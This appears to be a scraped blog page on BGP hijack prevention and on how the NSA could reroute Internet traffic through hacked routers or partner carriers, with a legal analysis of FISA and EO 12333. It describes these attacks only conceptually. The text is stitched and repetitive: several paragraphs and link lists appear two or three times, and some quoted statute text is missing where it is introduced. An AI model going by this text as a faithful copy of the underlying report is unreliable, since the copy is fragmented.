https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
Japan Google's Verizon route-leaking private setups to the world:
https://bgpmon.net/bgp-leak-causing-internet-outages-in-japan-and-beyond/
Widespread outages, particularly in Japan (OCN) were because of the more specifics, causing many networks to reroute traffic toward verizon and Google which likely would have congested that path or perhaps hit some kind of acl, resulting in the outages.
----------------------------------------------------------
https://foreignminister.gov.au/releases/Pages/2018/mp_mr_181221.aspx
https://securityintelligence.com/think-your-network-is-safe-if-you-dont-have-visibility-into-hardware-vulnerabilities-think-again/
https://www.terraform.io/downloads.html
https://securityintelligence.com/how-open-source-intelligence-could-save-your-network/
https://securityintelligence.com/ibm-x-force-security-predictions-for-the-2019-cybercrime-threat-landscape/
-----------------------------------------------------------
https://www.us-cert.gov/china
Operation Cloud Hopper:
https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf
Japan Google's Verizon route-leaking private setups to the world:
https://bgpmon.net/bgp-leak-causing-internet-outages-in-japan-and-beyond/
Widespread outages, particularly in Japan (OCN) were because of the more specifics, causing many networks to reroute traffic toward verizon and Google which likely would have congested that path or perhaps hit some kind of acl, resulting in the outages.
----------------------------------------------------------
https://foreignminister.gov.au/releases/Pages/2018/mp_mr_181221.aspx
https://securityintelligence.com/think-your-network-is-safe-if-you-dont-have-visibility-into-hardware-vulnerabilities-think-again/
https://www.terraform.io/downloads.html
https://securityintelligence.com/how-open-source-intelligence-could-save-your-network/
https://securityintelligence.com/ibm-x-force-security-predictions-for-the-2019-cybercrime-threat-landscape/
-----------------------------------------------------------
Enterprises asking ISPs "How do you Protect us from BGP Hijacks?"
Think of the consequences as you go through the BGP "Hijacking" Risk Reduction questions. First, these questions should not be a surprise with Telcom and ISPs around the world. They are legitimate questions with is part of the service you are buying from your providers. Second, they often become the "justification" for the staff in the ISP to take action. "We have five top customers all ask us about BGP security. Boss, we think it is time to take action." Finally, the simple BGP Hijack Security dialog will put everyone on a watchful stance. People will notice when someone tries to deploy a BGP Hijack. The industry decreases its response time to these hijacks all because CxOs in Enterprise network around the world is asking the question ..... "How are we protecting ourselves from BGP HijacksSaturday, December 8, 2018
BGP hijack prevention
- IRR Power Tools (IRRPT) https://github.com/6connect/irrpt
- Internet Routing Registry Toolset (IRRToolset) https://github.com/irrtoolset/irrtoolset
- BGPQ3 https://github.com/snar/bgpq3
- Ansible http://www.ansible.com/
- Cisco Network Services Orchestrator http://www.cisco.com/go/nso
- IRR Explorer http://irrexplorer.nlnog.net/
https://www.manrs.org
---------------------------------
https://www.blackhat.com/presentations/bh-dc-09/Zmijewski/BlackHat-DC-09-Zmijewski-Defend-BGP-MITM.pdf
---------------------------------
all of the team members needed to be able to work creatively,
independently and yet still in concert with each other, sometimes under
circumstances of limited communications.
---------------------------------
International detours and routing changes happen automatically,
without human intervention. Even so, they offer an opportunity to the
NSA. With some exceptions, the surveillance of raw Internet traffic from
foreign points of interception can be conducted entirely under the
authority of the president.
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
Congressional and judicial limitations come into play only when that raw Internet traffic is used to “intentionally target a U.S. person,” a legal notion that is narrowly interpreted to exclude the bulk collection, storage, and even certain types of computerized data analysis.8
This is a crucial issue, because American data are routed across foreign communications cables. Several leading thinkers,9 including Jennifer Granick in her recent report for The Century Foundation, have drawn attention to the creeping risk of domestic surveillance that is conducted from afar.
This report describes a novel and more disturbing set of risks. As a technical matter, the NSA does not have to wait for domestic communications to naturally turn up abroad.
In fact, the agency has technical methods that can be used to deliberately reroute Internet communications. The NSA uses the term “traffic shaping” to describe any technical means the deliberately reroutes Internet traffic to a location that is better suited, operationally, to surveillance.
Since it is hard to intercept Yemen’s international communications from inside Yemen itself, the agency might try to “shape” the traffic so that it passes through friendly communications cables located on friendlier territory.10
Think of it as diverting part of a river to a location from which it is easier (or more legal) to catch fish.
The NSA has clandestine means of diverting portions of the river of Internet traffic that travels on global communications cables.
If, for example, the Federal Bureau of Investigations (FBI) wants to monitor electronic communications between two Americans as part of a criminal investigation, it is required by law to obtain a warrant.12
If the intelligence community wants to intercept Americans’ communications inside the United States, for national security reasons, then it must follow rules established by the Foreign Intelligence Surveillance Act (FISA).13
Meanwhile, when the intelligence community wants to intercept traffic abroad, its surveillance is mostly regulated by Executive Order 12333 (EO 12333),14 issued by Ronald Reagan in 1981.15
Surveillance programs conducted under FISA are subject to oversight by the FISA Court and regular review by the intelligence committees in Congress.
Meanwhile, surveillance programs under EO 12333 are largely unchecked by either the legislative16 or judicial branch. EO 12333 programs are conducted entirely under the authority of the president.
The narrow interpretation of “targeting” has significant implications on privacy for U.S. persons. For instance, the NSA has built a “search engine”44 that allows analysts to hunt through raw data collected in bulk through various means. If a human analyst uses that search engine to search for communications linked to a specific email address, Facebook username, or other personal identifier—a “selector”45—then that counts as “intentional targeting.”
However, if an analyst obtains information using search terms that do not implicate a single individual—for example, words or phrases such as “Yemen” or “nuclear proliferation”—the communications swept up as part of this search, such as an email between two Americans discussing current events in Yemen, are not considered to be “intentionally targeted.”46 Instead, these communications are merely “incidentally collected.”47
U.S. surveillance techniques are classified, which prevents outside observers from making categorical statements about how far the intelligence community stretches this notion of “incidental collection.”
But how do communications between two Americans typically travel abroad?
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.
Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
Another clause in the FISA statute defines “electronic surveillance” as
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
It can sometimes be faster or cheaper for Internet service providers (ISP) to send traffic through a foreign country. The United States has a well-connected communications infrastructure, so it is rare to find a case where traffic sent between two domestic computers naturally travels through a foreign country.
Nevertheless, these cases do occur. One such case (identified by Dyn Research’s Internet measurement infrastructure) is presented below
(Figure 1)
The “traceroute” presented below shows how Internet traffic sent between two domestic computers travels through foreign territory. The traffic originates at a computer in San Jose and is routed through Frankfurt before arriving at its final destination in New York. The left column shows the Internet Protocol (IP) address of each Internet device on the route, the middle column names the Internet Service Provider (ISP) that owns this device, and the right column shows the location of the device.
Replicating U.S.-based data in foreign data centers is a common industry practice, in order to ensure that data can be recovered even in the face of local disasters (power outages, earthquakes, and so on).53 Google, for instance, maintains data centers in the United States, Taiwan, Singapore, Chile, Ireland, the Netherlands, Finland, and Belgium, and its privacy policy states: “Google processes personal information on our servers in many countries around the world. We may process your personal information on a server located outside the country where you live.”54 If two Americans use their Google accounts to communicate, their emails and chat logs may be backed up on Google’s data centers abroad, and thus can be “incidentally collected” as part of EO 12333 surveillance.
Traffic Shaping by “Port Mirroring” at Hacked Routers
It has been reported that the NSA already employs a technique to “shape” traffic so that it travels through a tapped communication cable. The traffic-shaping technique involves hacking into an Internet infrastructure device, for example, a router. A router is a device that forwards Internet traffic to its destination.73 In Figure 3, which was hand-drawn by a hacker employed by the NSA and later leaked, the hacked device74 is called a “CNE midpoint.”75“Electronic surveillance”
is a legal term that is defined the FISA statute; in fact, despite several amendments, FISA’s definition of “electronic surveillance” remains largely unchanged from its original 1978 version. The FISA definition of “electronic surveillance” has two clauses that could be potentially cover hacking into a U.S. router and instructing it to perform traffic shaping via port-mirroring.
One clause in the FISA statute defines “electronic surveillance” to be
the installation or use of an
electronic, mechanical, or other surveillance device in the United
States for monitoring to acquire information, other than from a wire or
radio communication, under circumstances in which a person has a
reasonable expectation of privacy and a warrant would be required for
law enforcement purposes.81
In other words, this clause covers the installation of a device in
the United States for surveillance. Hacking a U.S. router could
certainly be considered the installation of a device. However, a router
is a “wireline” device, and this clause does not cover devices that
acquire information from a “wire.”82 As such, this clause is not relevant to the discussion.Another clause in the FISA statute defines “electronic surveillance” as
the acquisition by an electronic,
mechanical, or other surveillance device of the contents of any wire
communication to or from a person in the United States, without the
consent of any party thereto, if such acquisition occurs in the United
States, but does not include the acquisition of those communications of
computer trespassers that would be permissible under section 2511(2)(i)
of title 18, United States Code.83
This clause covers the “acquisition” of communications inside the United States. However, one could argue that communications are not “acquired” when a U.S. router is hacked and instructed to perform port mirroring. The hacked router is merely instructed to copy traffic and pass it along, but not to read, store, or analyze it. Therefore, “acquisition” occurs at the tapped communication cable (abroad) rather than at the hacked router (inside the United States). As such, this clause is also not relevant.84
The intelligence community does not have to hack into routers or use other clandestine techniques to shape traffic—it could simply ask the corporations that own those routers to provide access, or shape the traffic themselves. A document leaked by Edward Snowden suggests that the NSA has done this through its FAIRVIEW program.
(FAIRVIEW was revealed to be a code name for AT&T100). The document states:
FAIRVIEW—Corp partner since 1985 with
access to int[ernational] cables, routers, and switches. The partner
operates in the U.S., but has access to information that transits the
nation and through its corporate relationships provide unique access to
other telecoms and ISPs. Aggressively involved in shaping traffic to run
signals of interest past our monitors.101
There is no evidence that the FAIRVIEW program is being used to shape traffic from inside the United States to foreign communications cables. But it is worth noting that, with the cooperation of corporations such as AT&T, traffic could easily be shaped to a collection point abroad without the need to hack into any routers, thus obviating many of the legal questions previously discussed.
Modern networking protocols and technologies can be manipulated in order to shape Internet traffic from inside the United States toward tapped communications cables located abroad. It is possible that traffic shaping is regulated by EO 12333, and not by FISA,102 since the techniques shape traffic in bulk, in a way that does not “intentionally target” any specific individual or organization.
Moreover, while FISA covers the “acquisition” of Internet traffic on U.S. territory, but the traffic shaping methods discussed merely move traffic around, but do not read, store, analyze, or otherwise “acquire” it. Instead, acquisition is performed on foreign soil, at the tapped communication cable. Finally, while the Fourth Amendment may require a warrant for hacking U.S. routers, the warrant requirement could be avoided by performing traffic shaping with the consent of corporations that own the routers (e.g. via the FAIRVIEW program), or by hacking foreign routers (and then using BGP manipulations).
Technical Solutions Will Not Work
One might be tempted to eliminate these loopholes via technical solutions. For instance, traffic shaping could be made more difficult by designing routers that are “unhackable,” and Internet protocols could be made secure against traffic-shaping manipulations. Or the confidentiality of traffic could be protected just by encrypting everything.While this approach sounds good in theory, in practice it is unlikely to work.
First, it is highly unlikely that we will ever have Internet infrastructure devices (e.g. routers) that cannot be hacked. Router software is complicated, and even the best attempt at an “unhackable” router is likely to contain bugs.104 Intelligence agencies have dedicated resources to finding and using these bugs to hack into routers.105 And even if we somehow manage to create bug-free router software, the intelligence community has been known to physically intercept routers as they ship in the mail, and tamper with their hardware.106
Second, it will take many years to develop and implement secure Internet protocols that prevent traffic shaping. A key challenge is that the Internet is a global system, one that transcends organizational and national boundaries. Deploying a secure Internet protocol requires cooperation from thousands of independent organizations in different nations. This is further complicated by the fact that many secure Internet protocols do not work well when they are used only by a small number of networks.107
Finally, while encryption can be used to hide the contents of Internet traffic, it does not hide metadata (that is, who is talking to whom, when they are talking, and for how long). Metadata is both incredibly revealing, and less protected by the law.108 Intelligence agencies have also dedicated resources toward compromising encryption.109 Moreover, EO 12333 allows the NSA to retain encrypted communications indefinitely.110 This is significant because the technology used to break encryption tends to improve over time—a message that was encrypted in the past could be decryptable in the future, as technology improves.111
This is not to say that technical solutions are unimportant. On the contrary, they are crucial, especially because they protect American’s traffic from snoopers, criminals, foreign intelligence services, and other entities that do not obey American laws. Nevertheless, technologies evolve at a rapid pace, so solving the problem using technology would be a continuous struggle.
It is much more sensible to realign the legal framework governing surveillance to encompass the technologies, capabilities, and practices of today and of the future.
Subscribe to:
Posts (Atom)